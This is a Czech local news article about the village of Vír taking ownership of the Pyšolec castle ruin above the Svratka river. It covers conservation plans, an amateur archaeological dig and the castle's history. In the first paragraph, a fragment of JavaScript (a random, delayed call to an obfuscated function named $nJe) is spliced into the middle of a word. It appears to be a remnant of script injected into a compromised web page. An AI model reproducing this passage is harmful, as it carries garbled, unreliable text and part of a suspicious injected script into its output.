Rainbow page separator

Pyšolec přešel do vlastnictví Víru, cílem je zajištění ruiny

Úterý, 30. března 2021

Vír / Do svého vlastnictví na základě směny pozemků s Lesy ČR převzala obec Vír zříceninu hradu Pyšolec. Ten se nachází na ostrohu nad meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andrem řeky Svratky. Vírští se již před časem rozhodli, že zříceninu chtějí ve větší míře zpřístupnit turistům, tedy zejména zajistit hradní zdi, a to za pomoci dotačních programů. V plánu je i nová naučná stezka. Aktuálně v areálu památkově chráněné zříceniny probíhá průzkum, amatérští archeologové ze Spolku na ochranu památek Bystřicka, kteří se v okolí angažují již řadu let, se ve spolupráci s památkáři snaží dozdít šest metrů hlubokou cisternu na vodu, kterou vykopali přímo v hradu. Už předtím objevili řadu zajímavostí v těsném okolí ruiny, například pec, kde se vyrábělo vápno na stavbu hradu, vápencový lom i milíř na pálení dřevěného uhlí.
Hrad byl vystavěn ve 13. století, patřil šlechtickému roku Pernštejnů. Ve druhé polovině 15. století však zpustl, v roce 1464 je uváděn jako zbořený. Zbytky hradních zdí se tyčí vysoko nad řekou, která je obtéká ze třech stran – ze čtvrté vedla kdysi přístupová cesta s hlubokými příkopy s padacími mosty; pásy valů a hradeb byly trojité. Do současnosti se z Pyšolce zachovala část kdysi zhruba pětadvacet metrů vysoké věže a zbytek hradního paláce, který byl patrně s věží spojený pavlačí. Zbytkem opevnění je pilíř přímo nad vyrovnávací vodní nádrží Vír II. Pyšolec patří mezi tři zříceniny hradů v okolí – spojuje je červená turistická značka. Zubštejn a Aueršperk jsou ve správě Bystřice nad Pernštejnem, přičemž nejmohutnější Zubštejn byl za přibližně patnáct milionů korun s přispěním devadesátiprocentní dotace staticky zajištěn v roce 2011.